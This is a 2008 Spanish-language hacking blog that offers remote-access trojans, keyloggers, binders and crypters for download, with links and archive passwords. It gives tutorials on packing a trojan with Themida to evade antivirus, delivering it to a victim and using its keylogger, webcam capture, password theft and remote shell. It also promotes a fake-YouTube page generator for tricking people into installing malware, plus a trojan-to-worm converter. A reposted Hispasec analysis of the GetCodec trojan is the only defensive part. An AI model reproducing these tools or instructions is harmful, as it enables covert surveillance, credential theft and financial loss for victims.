[DARKNNES.BLOGSPOT.COM][HACKEAR MSN] - HACKEAR HOTMAIL, HACKEAR, MSN, XPLOITS GUSANITO Y OTRAS POSTALES, hack ...
viernes, 12 de septiembre de 2008
Nuevo troyano Outbreack 0.3 public version beta
Bueno os dejo un screen y la descarga, parece bueno.
INV4S10N Webcam Spy Mod By 4n0nym0us
Bueno esta modificación ha sido realizada por mi, es un troyano en Delphi de conexión inversa, para poder hacer conexiones a las Webcams, su modificación ha sido realizada a nivel Hexadecimal sobre el Servidor, y aclopada de nuevo al programa para poder hacer servers más indetectables, el servidor de serie era detectado por 17 de 22 antivirus ahora solo lo detectan 7, y sin ser encriptado...
| Antivirus | Detections |
| A-squared | Nothing found! |
| AntiVir | Contains a detection pattern of the (dangerous) backdoor program BDS/Eklips.D Backdoor server programs |
| Avast | Win32:Trojan-gen {Other} (0) |
| AVG | Nothing found! |
| BitDefender | Nothing found! |
| ClamWin | Nothing found! |
| Comodo | Nothing found! |
| Dr.Web | Trojan.PWS.Raway.2 |
| Ewido | Backdoor.Eklips.d |
| F-PROT 6 | Nothing found! |
| G DATA | Nothing found! |
| IkarusT3 | Nothing found! |
| McAfee | Nothing found! |
| NOD32 v3 | probably unknown NewHeur_PE virus |
| Norman | Infected with W32/Smalltroj.EGQK |
| Panda | Nothing found! |
| QuickHeal | Backdoor.Eklips.d |
| Solo Antivirus | Nothing found! |
| Sophos | Nothing found! |
| TrendMicro | Nothing found! |
| VBA32 | Nothing found! |
| VirusBuster | Nothing found! |
Imagenes:
Descargas:
http://rapidshare.com/files/1436317[....]ebcam_Spy_MOD_By_4n0nym0us.exe.html
http://www.megaupload.com/?d=BMUYPJZI
Página oficial de este troyano (Sin modificación)
http://forum.ninjaspy.org/index.php?showtopic=2375
Nuevo troyano !!!
Detalles sobre el troyano multimedia GetCodec
FUENTE: HISPASEC
---------------------------------------------
Andrea se conecta ansiosa al eMule para descargar el último capítulo
de Prison Break que se estrenó hace una hora en Estados Unidos.
"¡Perfecto! ¡Un usuario conectado compartiendo el archivo!". La
descarga se completa y se dispone a verlo sin más dilación… "qué
extraño, Windows Media Player solicita la descarga de un codec, bueno,
estará codificado con algo nuevo, no pasa nada, aceptar". A las pocas
semanas Andrea se encuentra en una comisaría poniendo una denuncia
porque le han sacado todos los ahorros de su cuenta bancaria.
¿Has reproducido con Windows Media Player algún archivo de audio o
video últimamente? Podrías estar infectado.
A finales de Julio hubo bastante revuelo con la aparición de un nuevo
troyano que afectaba a archivos multimedia. Este malware, que muchas
casas antivirus han denominado GetCodec, emplea una técnica de infección
que no había sido vista hasta el momento.
El troyano se ha detectado propagándose encubierto como cracks en
páginas de warez y cracks. Es totalmente silencioso, lo cual induce a
pensar que tan sólo se trata de otro crack corrupto más. Tras su
ejecución, el troyano busca todos aquellos archivos con extensiones
.MP2 .MP3 .WMA .WMV .ASF. El formato ASF es un formato propietario de
Microsoft empleado por Windows Media Player que permite introducir
secuencias ejecutables en flujos de audio/video. El troyano aprovecha
esta propiedad para introducir en los archivos multimedia de la
víctima una secuencia que solicita la descarga de un codec falso desde
un Sitio Web. Éste codec es a su vez otro troyano, aunque la técnica
podría emplearse para servir cualquier tipo de contenido.
Este método de infección también funciona con los archivos MPx porque
el troyano los convierte primero a formato ASF para después
inyectarles el código malicioso. De forma que un archivo con extensión
.MP3 puede estar infectado.
El espécimen modifica la configuración del usuario de tal forma que
este nunca llega a notar que sus archivos multimedia han cambiado, sin
embargo, todo aquel que no esté infectado e intente reproducirlos sí
notará el cambio. Cuando se reproduce un archivo multimedia infectado,
en una máquina limpia, Windows Media Player despliega una ventana
solicitando la descarga de un codec falso. Este codec puede ser
cualquier otro tipo de malware. Al aceptar la descarga se produce la
infección.
Tal y como se puede intuir, estas características lo hacen ideal para
la propagación vía redes P2P, unidades compartidas e intercambio de
medios de almacenamiento. Tomando como ejemplo las redes P2P,
cualquier usuario infectado estará actuando como servidor del malware.
Otro usuario que descargue sus archivos multimedia se verá infectado
si no es lo suficientemente cuidadoso.
Desde Hispasec, nuestro compañero Marcin Noga ha realizado un análisis
de ingeniería inversa del troyano con el fin de detallar su mecanismo
de infección. El documento se puede encontrar en las siguientes URLs:
(Español) http://www.hispasec.com/laboratorio/AnalisisGetCodec.pdf
(Inglés) http://www.hispasec.com/laboratorio/GetCodecAnalysis.pdf
De igual forma, Marcin ha desarrollado una herramienta para limpiar la
infección en todas aquellas máquinas que se han visto afectadas,
eliminando el código malicioso de los archivos multimedia infectados.
La herramienta puede ser descargada desde:
http://www.hispasec.com/laboratorio/MulTrojDisinfector.exe
Hashes
MD5...: dddb5fc1af0405dff247c6704d4e6b37
SHA1..: 5826c6d78604255bccec00c67efcd123795ddfd4
Hasta el momento los archivos de audio y video habían sido relativamente
inofensivos a no ser que estuvieran intencionadamente malformados para
causar la explotación de un reproductor vulnerable. Los usuarios de a
pie parecen seguir teniendo la idea equivocada de que tan sólo los
archivos ejecutables son peligrosos, como siempre, todo se resume a una
cuestión de concienciación. Esperamos que los documentos producidos por
el laboratorio de Hispasec ayuden en esta labor de concienciación y
educación.
Bifrost 1.2d
Haí os dejo lo que hace la nueva mejoras del bifrost 1.2.
Mejoras en la ocultacion:Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.
-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"
-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.
NUEVO TROYANO - PaiN Rat 0.1 Beta 9
Les presento un NUEVO troyano que parece ser es una mezcla de *Bifrost, Poison Ivy y Shark* (tiene de todo)
NOTA: RECUERDEN QUE ES UN TROYANO, NECESITAN DESACTIVAR SU ANTIVIRUS ANTES DE TRABAJAR CON EL, PORQUE SI NO LO HAZEN , EL ANTIVIRUS LO BORRARA O NO LOS DEJARA UTILIZARLO
http://rapidshare.com/files/136430302/painrat0.1Beta9.rar.html
Les dejo unas capturas.
Características:
----------
-- FWB (de inyección DLL, el DLL no es nunca por escrito con el disco)
-- Decente fuerte encriptación de tráfico
-- Trate de Unhook usermode API
-- No Plugins/3rd las aplicaciones de otros fabricantes
-- 4 Métodos de arranque (Shell, Políticas, ActiveX, UserInIt)
-- Fijación del máximo de conexiones
-- Función de Archivo Binder
-- Las transferencias multihilo
-- AntiDebugging (Anti VMware, VirtualPC, Anubis Sandbox etc ..)
Broadcast:
-----------
-- Servidor de Opciones
-- Búsqueda
| _Search Archivos
| _Search Windows
-- Contraseñas
| _Misc Contraseñas
| _FireFox Contraseñas
-- Suspender Opciones
-- Subir clave Registros
-- HTTP Descarga
-- Comando DOS
-- Descarga de memoria
-- USB Monitor
Función:
----------
-- Los gerentes
| _File Manager
| _Search Files (hilos)
| _Window Manager
| _Registry Editor
| Registro _Search
| _process Manager (Terminar, suspender, reanudar y reiniciar procesos)
| Lista _Modules (Descargue DLL de un proceso o procedentes de todos los procesos)
| _Device Manager *
| _Startup Manager (Registro de Arranque y carpetas)
| _Clipboard Manager (Texto y archivos)
| _Service Manager (Con Los conductores de Apoyo)
-- Vigilancia
| _Screen Capture (Con compresión PNG)
| _Webcam Capture (soporta múltiples WebCams)
| _Key Logger
| _Monitoring
| _USB Drives (Con Auto copiar archivos a USB)
| _Clipboard
-- Información
| _PC Información
| _User Cuentas
| _Available Cuentas
| _Logon Sesiones
| _CD Keys (Custome Lista)
| _Installed Apps.
| _Network Adaptadores
| _Active Puertos *
-- Contraseñas
| _Misc Contraseñas (Live Messenger y No-IP DUC)
| _FireFox Contraseñas (Apoya Firefox 2 y 3)
| _LSA Secretos
-- Varios
| _Memory Execute (Ejecutar de HTTP o de locales)
| _Message Box
| _Command Prompt
| _Display Configuración
| _Suspend Opciones
| _Script Creator
-- Net Tools
| _Web Server
| _Socks Server
| _Web Transferencias (descarga HTTP, FTP Carga y Descarga)
| _Port Escáner
| _Host De redireccionamiento
-----------------------------------------
* = No es compatible con Windows Vista (aún)
Servidor Tamaño: 173 KB (sin embalaje)
Tutorial Bifrost ingenieria inversa!
Ojalá les guste.
Primero que todo les explicaré que tiene de diferente el Bifrost de la mayoría de los otros troyanos como el sub7, optix pro, etc. El Bifrost es un troyano de conección "inversa", que significa esto; En la mayoría de los troyanos
al mandar el server a la víctima tenemos que sacar la ip del mismo para poder conectarnos desde NUESTRO pc al de la VICTIMA. En cambio, los troyanos inversos son aquellos que cuando la victima ejecuta el server este se conecta a nuestra pc. Las ventajas son que no nos tomamos el tiempo de sacar la ip... de que este bien y tal... y las desventajas son que muchas veces los firewalls agarran al server tratando de conectarse y nos caga nuestro hack.
bajate el bifrost de aqui http://www.4shared.com/file/30314315/80d43248/Bifrost121.html
Necesitas tener un host de no-ip, si no lo tienes puedes aprender a hacerlo aqui(no es necesario pero si más seguro tener una conección por medio de un dns):
http://www.ayuda-internet.net/tutoriales/manu-noip/manu-noip.html
Themida 1.9.1
Bueno, para los newbeys que no sepan hacer indetectable esta hecho este Tutorial ..
Lo primero es descargar el Themida , la última version
Descargar aquí
El .zip lleva contraseña, es: Antifahack.net
Lo descomprimimos y veremos esto ..
Por defecto viene en Ingles, pero le vamos a cambiar el idioma al que queramos; Español, Ruso, etc.
Para eso nos situamos en la seccion Optiones, y pinchamos en Advance Options y en Localization elegimos nuestro idioma, despues cerramos y abrimos el Themida y ya lo tendremos en nuestro idioma
Ahora en Fichero de Entrada, buscamos el Server.exe de nuestro Troyano.
Ahora clickeamos en Opciones de Protección. Lo dejamos como está en la imagen
En Code Replace no hay que tocar nada, asi que vamos a Maquina Virtual.
En Especificaciones del Procesador y Visualizacion Punto de Entrada lo modificado como esta en el screenhot
Ahora vamos a Opciones Avanzadas y veremos esto
Ahora solo falta clickear en Proteger, y cuando finalece, le damos directamente a Cerrar, porque si le damos a test (donde el rayo) nos infectaremos nostros xq habremos abierto el Server.
Despues enviamos el server a la victima y cuando se conecte...
en el bifrost veras muchas columnas:
Assigned Name: nombre que le has puesto a la victima
IP: La ip de la victima
Computer/User Name: Nombre del pc /sesion de la victima
Version: version del troyano
C: la X indica si el usuario tiene web cam
ping: es el ping de la victima, es lo q tarda en responder su pc, si el numero es muy elevado es que la victima se a caido y se desconectara.
al darle doble clic sobre el nombre de la victima aparecerera una ventana asi:
system info: te da la informacion del pc (version de windows, nombre...)
Unistall,update,reconnect,close server,restar server: son opciones del server como desistalar...
process list: lista de procesos, desde hay le puedes matar el msn y muxas cosas q no te interesa q tng abiertas.
windows list: es la lista de ventanas q tiene abierta en el escritorio.
password list: lista de contraseñas de IE
sobre el nombre de la victima, si pulsamos el boton derecho, veremos un menu asi:
File Manager: es su disco duro, puedes copiar, borrar, subir archivos...
System Manager: es lo mismo q dar doble click sobre el nombre, ya esta explicado arriva
Screen Capture: es para hacer capturas de pantalla, si marcas las casillas keyboard y mouse podras escribirle y clickearle en su pantalla, la barra de abajo a la izquierda regula la calidad de la captura.
Cam Capture: es para hacer capturas de web cam, la barra de abajo a la izquierda regula la calidad de la imagen.
Remote Shell: es la consola de msdos, le das a "Start" y comienza, solo debes poner los comandos que desees (muy usada para apagarle el pc poniendo shutdown -s -t 00).
key logger: al darle a keylogger veras una ventana como esta
Online Key Logger: es para ver lo q esta escribiendo la victima en ese mismo instante, activas la casilla de "Enable Online Key Logger" y empiezan a parecer las teclas q marca.
Find Pasword: busca las claves del IE.
Change Name: es para cambiar el nombre de la victima (Assigned Name).
CopY IP: Sirve para copiar la ip de la victima en el portapapeles.
IMPORTANTE:
si tienes un router no te funcionara y deberas abrir el puerto 2000, como cada router es diferente, os recomiendo q llameis a vuestro proveedor de internet y q el os lo explique.
Ojalá les haya servido. Aviso para que después no me critiquen: El tuto fue creado por mr cuco, yo modifique algunas cosas y agrege información. Así que los créditos van para él por tomarse el tiempo en sacar las fotos y otros créditos para mi por agregarle información
Me olvide de algo x'D, para poder saber tu propia ip puedes poner ipconfig en ms dos( Inicio, Ejecutar, tipias cmd.exe o command.exe, y luego tipeas ipconfig). O si eres más pajero vas a www.cualesmiip.com y ya =)
Saludos.
sábado, 6 de septiembre de 2008
PACK DE TROYANOS , BLINDERS , CHANGE ICONS , KEYLOGGERS
-Poison ivy 1.0
-Poison ivy 2.1
-Poison ivy 2.1.2
-Poison ivy 2.2.0
-Poison ivy 2.2.0 en español
DOWNLOAD
http://rapidshare.com/files/15863904/poison_ivy.rar.html
COOLVIBES
-Coolvibes 0.3
-Coolvibes 0.4
DOWNLOAD
http://rapidshare.com/files/15863324/coolvibes.rar.html
SUB7
-Sub seven 1.0
-Sub seven 1.1
-Sub seven 1.2
-Sub seven 1.3
-Sub seven 1.4
-Sub seven 1.5
-Sub seven 1.6
-Sub seven 1.7
-Sub seven 1.8
-Sub seven 1.9
-Sub seven 2.0
-Sub seven 2.1.0
-Sub seven 2.1.1
-Sub seven 2.1.2
-Sub seven 2.1.3
-Sub seven 2.1.4
-Sub seven legends 2.1.5
-Sub seven 2.2.0
DOWNLOAD
http://rapidshare.com/files/15865965/sub7.rar.html
Se que este troyano ya no es indetectable ni encriptandolo pero lo pongo por la cantidad de gente que lo pide, aparte que es un poco ‘difícil’ de utilizar, y eso es bueno para la gente que comienza en el hacking, comenzar por lo difícil se aprende mas...
PROGRAMAS PARA CAMBIAR ICONOS
-Changer
-ResHack
http://rapidshare.com/files/15866957/Hav-Rat_1.1.rar.html
HAV-RAT
-Hav-rat 1.1 [beta]
DOWNLOAD
http://rapidshare.com/files/15866957/Hav-Rat_1.1.rar.html
ENCRIPTADORES, JOINER Y BINDER
-Joiner cactus (también se puede cambiar el icono con este programa)
-Minke
-Deception v4.0
-Inbinder v1.0
-Binder par chti hack
-F.B.I
-Binder v2.0 beta 1
-File injecttor v3
-Binder v2.1
-Hook Tool Box
DOWNLOAD
http://rapidshare.com/files/15868425/encriptador__joiner_y_binder.rar.html
THEMIDA AKI : http://rapidshare.com/files/16008906/themida_1.8.5.rar.html
PRO RAT
-ProRat v1.4
-ProRat v1.6
-ProRat v1.8
-ProRat v1.9 FIX
-ProRat v1.9 FIX2
-ProRat v1.9
DOWNLOAD
http://lix.in/4be2b2
KEYLOGGERS
-FKWP v1.5
-SKL v0.1
-Password Logger
-Recon v1.2
-LogIT v1.0
-Elite keylogger v1.0
-LttLogger v2.0
-Recon v2.0
-Radar Spy v1.0
-Fearless KeySpy v2.0
-LttLogger v1.0
-Recon v1.0
DOWNLOAD
http://rapidshare.com/files/15862829/keyloggers.rar.html
espero les sirva de algoo
Método MEEPA Ayuda para los troyanos !
Un tutorial práctico sobre como hacer indetectable un troyano modificando sus firmas, este método resuelve los principales problemas del método RIT de hackxcrack como las firmas en encriptaciones o la imposibilidad de automatizar el proceso. Está enfocado a gente con pocos o nulos conocimientos sobre ensamblador. También subo un zip con una herramienta y el troyano para seguir el tutorial.
Publicado en la e-zine InSecurity
leer tutorial: http://mzrd.martes13.net/tutos/metodomeepa.pdf
herramientas necesarias: http://mzrd.martes13.net/tutos/meepa.zip
web: http://mzrd.martes13.net
lunes, 1 de septiembre de 2008
YouTube Fake Creator v1.0
Bueno hace minutos nomas termino un amigo mio el nuevo YouTube FakeCreator, es un software que te genera, se puede decir, un Fake de YouTube perfecto! Permitiendo infectar a una persona en un momento y sin tener que estar dando escusas o mintiendo para infectarla!
Imagenes:
Pantalla Principal
Editor del Index.html
Caracteristicas:
-Seleccion del Server a instalar
-Posibilidad de cambiar texto de la barra fake
-Posibilidad de cambiar titulo de la ventana
-Posibilidad de cambiar nombre del video
-Posibilidad de cambiar descripcion del video
-Posibilidad de cambiar comentario del video
-Posibilidad de cambiar usuario del comentario
- Y varias funciones mas
Funcionamiento:
Este fake consiste en darle a la victima una direccion web, donde estaran alojados los dos archivos del fake (Index.html e Error.html). La vicitma, al visitar el Index.html sera alertado de que es necesario instalar un supuesto componente para poder visualizar el video correctamente... pero ese "componente" no es nada mas que nuestro server, virus o archivo... entonces la vicitma descargara el componente y sera infectado.
Luego para que esta no sospeche, despues del tiempo elegido, redirecciona a la pagina Error.html, diciendole que no es posible ver el video por terminos de copyright.
Bueno es asi mas o menos como funciona, mas abajo tienen un ejemplo de como quedaria...
Demo:
Demo YouTube Fake Creator
Descarga:
RapidShare
MegaUpload
Nota: si tienen un error al iniciar el programa, de que les falta una ocx, descargun estete arhivo, descomprimanlos y ejecuten "Registrar.bat"... OCX Necesaria
y si te ha sido de utilidad votanos solo es un par de clicks.
vota aqui.
domingo, 31 de agosto de 2008
Trojan To Worm 2.0
Como se puede ver se añadieron varias caracteristicas como:
-Habilitar UPX: supongo que para comprimirlo.
-Habilitar Melt: para elimiar el archivo una vez ejecutado.
-Crear copia de seguridad: crea una copia de seguridad de tu server, antes de convertirlo en gusano.
-Se agrego una caracteristica de filtrado para que no infecte determinado usuario, la version vieja solo tenia para no infectar una determinada unidad extraible.
-Permite activarlo en una determinada fecha
-Permite mostrar un mensaje al ejecutar el gusano.
-Permite deshabilitar varias opciones de windows como el administrador de tareas, opciones de carpeta, etc
-Tambien tiene la posibilidad de seleccionar un icono para el gusano.
-Y por supuesto un nuevo y mejor diseño
Password: trojantoworm
